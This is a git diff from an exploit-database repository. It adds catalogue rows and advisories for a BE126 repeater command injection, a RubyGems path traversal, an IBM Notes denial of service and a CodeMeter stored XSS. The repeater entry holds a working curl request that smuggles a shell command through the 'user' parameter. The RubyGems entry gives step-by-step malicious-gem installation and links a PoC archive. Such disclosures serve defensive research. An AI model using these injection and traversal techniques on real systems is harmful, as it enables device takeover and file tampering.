diff --git a/files.csv b/files.csv index c07b75489..8b891ecc0 100644 --- a/files.csv +++ b/files.csv @@ -2011,6 +2011,7 @@ id,file,description,date,author,platform,type,port 17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 +42604,platforms/multiple/dos/42604.html,"IBM Notes 8.5.x/9.0.x - Denial of Service (2)",2017-08-31,"Dhiraj Mishra",multiple,dos,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 @@ -9224,6 +9225,9 @@ id,file,description,date,author,platform,type,port 42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0 42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0 42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0 +42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0 +42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0 +42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -38386,3 +38390,8 @@ id,file,description,date,author,platform,type,port 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0 +42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 +42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 +42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0 +42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0 +42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0 diff --git a/platforms/hardware/webapps/42608.txt b/platforms/hardware/webapps/42608.txt new file mode 100755 index 000000000..638b45c2d --- /dev/null +++ b/platforms/hardware/webapps/42608.txt @@ -0,0 +1,33 @@ +# Exploit Title: WIFI Repeater BE126 – Remote Code Execution +# Date Publish: 09/09/2017 +# Exploit Authors: Hay Mizrachi, Omer Kaspi + +# Contact: haymizrachi@gmail.com, komerk0@gmail.com +# Vendor Homepage: http://www.twsz.com +# Category: Webapps +# Version: 1.0 +# Tested on: Windows/Ubuntu 16.04 + +# CVE: CVE-2017-13713 + +1 - Description: + +HTTP POST request that contains user parmater which can give us to run +Remote Code Execution to the device. +The parameter is not sanitized at all, which cause him to be vulnerable. + + +2 - Proof of Concept: + +curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! > +/var/mycode;&password=a&port=8&dir=a" +--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112 +01:45:46 GMT; langmanulset=yes; +sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us" +-X POST http://beconnected.client/cgi-bin/webupg + +3 - Timeline: + +29/4/2017 – Vulnerability Discovered. +29/4/2017 - Vendor not responding. +03/09/2017 – Exploit published. diff --git a/platforms/linux/local/42611.txt b/platforms/linux/local/42611.txt new file mode 100755 index 000000000..c42ef63a5 --- /dev/null +++ b/platforms/linux/local/42611.txt @@ -0,0 +1,30 @@ +There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file. + +Proof of Concept 1: Create a file anywhere + +This PoC attempts to create a file /tmp/malicious-0/BOOOOM. + +1) Download the attached file malicious.gem. +2) Run gem install malicious.gem --no-doc. +3) /tmp/malicious-0/BOOOOM should be created. + +malicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named -, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/. + +Proof of Concept 2: Replace rackup command + +This PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file. + +1) Download the attached file replace-rackup.gem. +2) Run gem install rack -v 2.0.3. +3) Run gem install replace-rackup.gem --no-doc. +4) Run rackup. It will emit just BOOOOM!. + +replace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers. + +Note + +For how to create the malicious gems, see the attached file src.tar.gz. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip diff --git a/platforms/multiple/dos/42604.html b/platforms/multiple/dos/42604.html new file mode 100755 index 000000000..27918384c --- /dev/null +++ b/platforms/multiple/dos/42604.html @@ -0,0 +1,42 @@ +# Exploit Title: IBM Notes is affected by a denial of service vulnerability +# Date: 31 August 2017 +# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 +# Exploit Author: Dhiraj Mishra +# Contact: http://twitter.com/mishradhiraj_ +# Website: http://datarift.blogspot.in/ +# CVE: CVE-2017-1130 +# Category: IBM Notes (Console Application) + + +1. Description + +IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted. + +2. Proof of concept + + + + +3. IBM Security Bulletin + +http://www-01.ibm.com/support/docview.wss?uid=swg21999384 \ No newline at end of file diff --git a/platforms/multiple/webapps/42610.txt b/platforms/multiple/webapps/42610.txt new file mode 100755 index 000000000..45ef6580a --- /dev/null +++ b/platforms/multiple/webapps/42610.txt @@ -0,0 +1,316 @@ +Document Title: +=============== +Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2074 + +ID: FB49498 + +Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/ + +http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754 + +CVE-ID: +======= +CVE-2017-13754 + + +Release Date: +============= +2017-09-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2074 + + +Common Vulnerability Scoring System: +==================================== +3.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all +solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and +reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business +workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your +applications and libraries. In addition, CodeMeter offers an API for custom integration with your software. + +(Copy of the Homepage: http://www.wibu.com/us/codemeter.html ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official +Wibu Systems CodeMeter WebAdmin v6.50 application. + + +Vulnerability Disclosure Timeline: +================================== +2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) +2017-05-21: Vendor Notification (Wibu Systems AG - Security Department) +2017-05-22: Vendor Response/Feedback (Wibu Systems AG - Security Department) +2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team) +2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department) +2017-09-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Wibu-Systems AG +Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application. +The vulnerability allows remote attackers to inject own malicious script code with application-side vector to the vulnerable function or +module to followup with a compromising attack. + +The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module. +The request method to inject is POST and the attack vector is located on the application-side. First the attacker injects the payload and +after it the POST request is performed to save the content permanently. After that the issue triggers on each visit an execution. The basic +validation in the application is well setup but in case of the advanced settings the validation parameter are still not implemented to secure +the function at all. The vulnerability is a classic filter input validation vulnerability. The application has no cookies and therefore the +attack risk is more minor but not that less then to ignore it. The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html` +and `certified_time.html`. The `ChangeConfiguration.html` is marked as injection point for the payload. The `time_server_list.html` and +`certified_time.html` files are mared with the execution point of the issue. + +The security issue was uncovered during the blurrybox hacking contest of the wibu systems ag and acknowledged by the management. + +The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. +Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account. +Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and +persistent manipulation of affected or connected application modules. + + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Advanced Settings - Time Server + +Vulnerable File(s): +[+] ChangeConfiguration.html + +Vulnerable Parameter(s): +[+] server name + +Affected Module(s): +[+] time_server_list.html +[+] certified_time.html + + +Proof of Concept (PoC): +======================= +The persistent input validation vulnerability can be exploited by remote attackers with privileged user account and with low user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start the CodeMeter software +2. Open the webadmin gui +3. Move to advanced settings +4. Open the time-server module +5. Click the plus to add a new time server +Note: The request method is POST +6. Inject a test script code payload with matching domain and save via POST +7. The code is saved and executes of the dbms in the time-server list module index +8. Successful reproduce of the vulnerability! + +Note: The method can be automated by usage of post method requester to include a payload. + + +PoC: Payload (Exploitation) +cmtime.codehacker.de/>" +cmtime.codehacker.de/>"